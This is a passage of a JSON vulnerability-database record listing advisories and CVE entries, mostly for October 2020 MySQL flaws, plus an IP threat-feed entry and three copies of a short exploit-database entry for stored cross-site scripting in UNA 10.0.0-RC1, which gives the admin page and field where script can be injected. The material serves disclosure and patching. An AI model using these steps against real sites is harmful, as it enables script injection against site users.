2021-02-04T03:00:00.\n IOC tags: **generic**.\nASN 2510: (First IP 58.0.0.0, Last IP 58.1.255.255).\nASN Name \"INFOWEB\" and Organisation \"FUJITSU LIMITED\".\nASN hosts 14804 domains.\nGEO IP information: City \"Hidaka\", Country \"Japan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-04T00:00:00", "id": "RST:DC4A2C50-9FB3-3D99-A8E7-C0AC112203DB", "href": "", "published": "2021-02-04T00:00:00", "title": "RST Threat feed. IOC: 58.1.250.232", "type": "rst", "cvss": {}}], "ubuntu": [{"lastseen": "2020-11-11T00:47:50", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14837", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2020-14829", "CVE-2020-14771", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2020-14848", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2020-14786", "CVE-2020-14760", "CVE-2020-14852", "CVE-2020-14791", "CVE-2020-14776", "CVE-2020-14773", "CVE-2020-14861", "CVE-2020-14821", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2020-14860", "CVE-2020-14873", "CVE-2020-14870", "CVE-2020-14836", "CVE-2020-14846", "CVE-2020-14827", "CVE-2020-14853", "CVE-2020-14672", "CVE-2020-14790", "CVE-2020-14867"], "description": "Multiple security issues were discovered in MySQL and this update includes \nnew upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 8.0.22 in Ubuntu 20.04 LTS and Ubuntu 20.10. \nUbuntu 16.04 LTS and Ubuntu 18.04 LTS have been updated to MySQL 5.7.32.\n\nIn addition to security fixes, the updated packages contain bug fixes, new \nfeatures, and possibly incompatible changes.\n\nPlease see the following for more information:\n\n<https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-32.html>\n\n<https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-22.html>\n\n<https://www.oracle.com/security-alerts/cpuoct2020.html>", "edition": 3, "modified": "2020-10-27T00:00:00", "published": "2020-10-27T00:00:00", "id": "USN-4604-1", "href": "https://ubuntu.com/security/notices/USN-4604-1", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T07:36:59", "description": "Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).", "edition": 5, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-10-21T15:15:00", "title": "CVE-2020-14804", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14804"], "modified": "2020-10-23T18:22:00", "cpe": ["cpe:/a:oracle:mysql:8.0.21"], "id": "CVE-2020-14804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14804", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:8.0.21:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "freebsd": [{"lastseen": "2020-11-07T21:17:21", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14837", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2020-14829", "CVE-2020-14771", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2020-14848", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2020-14786", "CVE-2020-14760", "CVE-2020-14852", "CVE-2020-14791", "CVE-2020-14776", "CVE-2020-14773", "CVE-2020-14861", "CVE-2020-14821", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2020-14860", "CVE-2020-14873", "CVE-2020-14870", "CVE-2020-14836", "CVE-2020-14846", "CVE-2020-14827", "CVE-2020-14672", "CVE-2020-14790", "CVE-2020-14867", "CVE-2020-14799"], "description": "\nOracle reports:\n\nThis Critical Patch Update contains 48 new security patches for\n\t Oracle MySQL.\nThe highest CVSS v3.1 Base Score of vulnerabilities affecting Oracle\n\t MySQL is 8.\nNOTE: MariaDB only contains CVE-2020-14812 CVE-2020-14765\n\t CVE-2020-14776 and CVE-2020-14789\n\n", "edition": 4, "modified": "2020-11-07T00:00:00", "published": "2020-10-20T00:00:00", "id": "4FBA07CA-13AA-11EB-B31E-D4C9EF517024", "href": "https://vuxml.freebsd.org/freebsd/4fba07ca-13aa-11eb-b31e-d4c9ef517024.html", "title": "MySQL -- Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2020-12-24T15:41:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-7285", "CVE-2015-1832", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1000338", "CVE-2016-1000339", "CVE-2016-1000340", "CVE-2016-1000341", "CVE-2016-1000342", "CVE-2016-1000343", "CVE-2016-1000344", "CVE-2016-1000345", "CVE-2016-1000346", "CVE-2016-1000352", "CVE-2016-10244", "CVE-2016-10328", "CVE-2016-2167", "CVE-2016-2168", "CVE-2016-2183", "CVE-2016-2510", "CVE-2016-3189", "CVE-2016-4800", "CVE-2016-5000", "CVE-2016-5300", "CVE-2016-5725", "CVE-2016-6153", "CVE-2016-6306", "CVE-2016-8610", "CVE-2016-8734", "CVE-2017-10989", "CVE-2017-12626", "CVE-2017-13098", "CVE-2017-13685", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-15095", "CVE-2017-15286", "CVE-2017-17485", "CVE-2017-3164", "CVE-2017-5644", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-7525", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2017-9096", "CVE-2017-9735", "CVE-2017-9800", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000873", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-14718", "CVE-2018-15769", "CVE-2018-17196", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-2765", "CVE-2018-3693", "CVE-2018-5382", "CVE-2018-5968", "CVE-2018-6942", "CVE-2018-7489", "CVE-2018-8013", "CVE-2018-8088", "CVE-2018-8740", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0192", "CVE-2019-0201", "CVE-2019-10072", "CVE-2019-10097", "CVE-2019-1010239", "CVE-2019-10173", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11048", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-11834", "CVE-2019-11835", "CVE-2019-11922", "CVE-2019-12086", "CVE-2019-12260", "CVE-2019-12261", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12900", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14540", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17495", "CVE-2019-17531", "CVE-2019-17543", "CVE-2019-17558", "CVE-2019-17569", "CVE-2019-17632", "CVE-2019-17638", "CVE-2019-18348", "CVE-2019-20330", "CVE-2019-2897", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5018", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9513", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-10108", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11984", "CVE-2020-11993", "CVE-2020-11996", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-13920", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-14672", "CVE-2020-14731", "CVE-2020-14732", "CVE-2020-14734", "CVE-2020-14735", "CVE-2020-14736", "CVE-2020-14740", "CVE-2020-14741", "CVE-2020-14742", "CVE-2020-14743", "CVE-2020-14744", "CVE-2020-14745", "CVE-2020-14746", "CVE-2020-14752", "CVE-2020-14753", "CVE-2020-14754", "CVE-2020-14757", "CVE-2020-14758", "CVE-2020-14759", "CVE-2020-14760", "CVE-2020-14761", "CVE-2020-14762", "CVE-2020-14763", "CVE-2020-14764", "CVE-2020-14765", "CVE-2020-14766", "CVE-2020-14767", "CVE-2020-14768", "CVE-2020-14769", "CVE-2020-14770", "CVE-2020-14771", "CVE-2020-14772", "CVE-2020-14773", "CVE-2020-14774", "CVE-2020-14775", "CVE-2020-14776", "CVE-2020-14777", "CVE-2020-14778", "CVE-2020-14779", "CVE-2020-14780", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14783", "CVE-2020-14784", "CVE-2020-14785", "CVE-2020-14786", "CVE-2020-14787", "CVE-2020-14788", "CVE-2020-14789", "CVE-2020-14790", "CVE-2020-14791", "CVE-2020-14792", "CVE-2020-14793", "CVE-2020-14794", "CVE-2020-14795", "CVE-2020-14796", "CVE-2020-14797", "CVE-2020-14798", "CVE-2020-14799", "CVE-2020-14800", "CVE-2020-14801", "CVE-2020-14802", "CVE-2020-14803", "CVE-2020-14804", "CVE-2020-14805", "CVE-2020-14806", "CVE-2020-14807", "CVE-2020-14808", "CVE-2020-14809", "CVE-2020-14810", "CVE-2020-14811", "CVE-2020-14812", "CVE-2020-14813", "CVE-2020-14814", "CVE-2020-14815", "CVE-2020-14816", "CVE-2020-14817", "CVE-2020-14818", "CVE-2020-14819", "CVE-2020-14820", "CVE-2020-14821", "CVE-2020-14822", "CVE-2020-14823", "CVE-2020-14824", "CVE-2020-14825", "CVE-2020-14826", "CVE-2020-14827", "CVE-2020-14828", "CVE-2020-14829", "CVE-2020-14830", "CVE-2020-14831", "CVE-2020-14832", "CVE-2020-14833", "CVE-2020-14834", "CVE-2020-14835", "CVE-2020-14836", "CVE-2020-14837", "CVE-2020-14838", "CVE-2020-14839", "CVE-2020-14840", "CVE-2020-14841", "CVE-2020-14842", "CVE-2020-14843", "CVE-2020-14844", "CVE-2020-14845", "CVE-2020-14846", "CVE-2020-14847", "CVE-2020-14848", "CVE-2020-14849", "CVE-2020-14850", "CVE-2020-14851", "CVE-2020-14852", "CVE-2020-14853", "CVE-2020-14854", "CVE-2020-14855", "CVE-2020-14856", "CVE-2020-14857", "CVE-2020-14858", "CVE-2020-14859", "CVE-2020-14860", "CVE-2020-14861", "CVE-2020-14862", "CVE-2020-14863", "CVE-2020-14864", "CVE-2020-14865", "CVE-2020-14866", "CVE-2020-14867", "CVE-2020-14868", "CVE-2020-14869", "CVE-2020-14870", "CVE-2020-14871", "CVE-2020-14872", "CVE-2020-14873", "CVE-2020-14875", "CVE-2020-14876", "CVE-2020-14877", "CVE-2020-14878", "CVE-2020-14879", "CVE-2020-14880", "CVE-2020-14881", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-14884", "CVE-2020-14885", "CVE-2020-14886", "CVE-2020-14887", "CVE-2020-14888", "CVE-2020-14889", "CVE-2020-14890", "CVE-2020-14891", "CVE-2020-14892", "CVE-2020-14893", "CVE-2020-14894", "CVE-2020-14895", "CVE-2020-14896", "CVE-2020-14897", "CVE-2020-14898", "CVE-2020-14899", "CVE-2020-14900", "CVE-2020-14901", "CVE-2020-15358", "CVE-2020-15389", "CVE-2020-1730", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1953", "CVE-2020-1954", "CVE-2020-1967", "CVE-2020-2555", "CVE-2020-3235", "CVE-2020-3909", "CVE-2020-4051", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-7067", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8840", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9409", "CVE-2020-9410", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9489", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n \nStarting with the October 2020 Critical Patch Update, Oracle lists updates that address vulnerabilities in third-party components which are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix. Oracle has published two versions of the October 2020 Critical Patch Update Advisory: this version of the advisory implemented the change in how non-exploitable vulnerabilities in third-party components are reported, and the \u201ctraditional\u201d advisory follows the same format as the previous advisories. The \u201ctraditional\u201d advisory is published at <https://www.oracle.com/security-alerts/cpuoct2020traditional.html>. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 403 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2712240.1>).\n", "modified": "2020-12-08T00:00:00", "published": "2020-10-20T00:00:00", "id": "ORACLE:CPUOCT2020", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2020", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T07:53:44", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-08-13T00:00:00", "title": "UNA 10.0.0 RC1 - (polyglot.php) Persistent Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14804"], "modified": "2019-08-13T00:00:00", "id": "1337DAY-ID-33101", "href": "https://0day.today/exploit/description/33101", "sourceData": "# Exploit Title: [UNA - 10.0.0-RC1 stored XSS vuln.]\r\n# Exploit Author: [Greg.Priest]\r\n# Vendor Homepage: [https://una.io/]\r\n# Software Link: [https://github.com/unaio/una/tree/master/studio]\r\n# Version: [UNA - 10.0.0-RC1]\r\n# Tested on: [Windows/Linux ]\r\n# CVE : [CVE-2019-14804]\r\n\r\nUNA-v.10.0.0-RC1 [Stored XSS Vulnerability]#1\r\n\r\n Sign in to admin and look for the [\"etemplates\"] page (/studio/polyglot.php?page=etemplates)!\r\n Click [\"Emails\"] and edit the templates! Inject the JavaScript code into the [\"System Name\"] field!\r\n \r\n http://127.0.0.1/UNA/studio/polyglot.php?page=etemplates\r\n \r\nhttps://github.com/Gr3gPr1est/BugReport/blob/master/CVE-2019-14804.pdf\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33101"}], "exploitdb": [{"lastseen": "2019-08-12T15:45:01", "description": "", "published": "2019-08-12T00:00:00", "type": "exploitdb", "title": "UNA 10.0.0 RC1 - &#039;polyglot.php&#039; Persistent Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14804"], "modified": "2019-08-12T00:00:00", "id": "EDB-ID:47221", "href": "https://www.exploit-db.com/exploits/47221", "sourceData": "# Exploit Title: [UNA - 10.0.0-RC1 stored XSS vuln.]\r\n# Date: [2019 08 10]\r\n# Exploit Author: [Greg.Priest]\r\n# Vendor Homepage: [https://una.io/]\r\n# Software Link: [https://github.com/unaio/una/tree/master/studio]\r\n# Version: [UNA - 10.0.0-RC1]\r\n# Tested on: [Windows/Linux ]\r\n# CVE : [CVE-2019-14804]\r\n\r\nUNA-v.10.0.0-RC1 [Stored XSS Vulnerability]#1\r\n\r\n Sign in to admin and look for the [\"etemplates\"] page (/studio/polyglot.php?page=etemplates)!\r\n Click [\"Emails\"] and edit the templates! Inject the JavaScript code into the [\"System Name\"] field!\r\n \r\n http://127.0.0.1/UNA/studio/polyglot.php?page=etemplates\r\n \r\nhttps://github.com/Gr3gPr1est/BugReport/blob/master/CVE-2019-14804.pdf", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47221"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:52", "description": "\nUNA 10.0.0 RC1 - polyglot.php Persistent Cross-Site Scripting", "edition": 1, "published": "2019-08-12T00:00:00", "title": "UNA 10.0.0 RC1 - polyglot.php Persistent Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14804"], "modified": "2019-08-12T00:00:00", "id": "EXPLOITPACK:4F663C0529B05B97F52D6A0019866B9E", "href": "", "sourceData": "# Exploit Title: [UNA - 10.0.0-RC1 stored XSS vuln.]\n# Date: [2019 08 10]\n# Exploit Author: [Greg.Priest]\n# Vendor Homepage: [https://una.io/]\n# Software Link: [https://github.com/unaio/una/tree/master/studio]\n# Version: [UNA - 10.0.0-RC1]\n# Tested on: [Windows/Linux ]\n# CVE : [CVE-2019-14804]\n\nUNA-v.10.0.0-RC1 [Stored XSS Vulnerability]#1\n\n Sign in to admin and look for the [\"etemplates\"] page (/studio/polyglot.php?page=etemplates)!\n Click [\"Emails\"] and edit the templates! Inject the JavaScript code into the [\"System Name\"] field!\n \n http://127.0.0.1/UNA/studio/polyglot.php?page=etemplates\n \nhttps://github.com/Gr3gPr1est/BugReport/blob/master/CVE-2019-14804.pdf", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}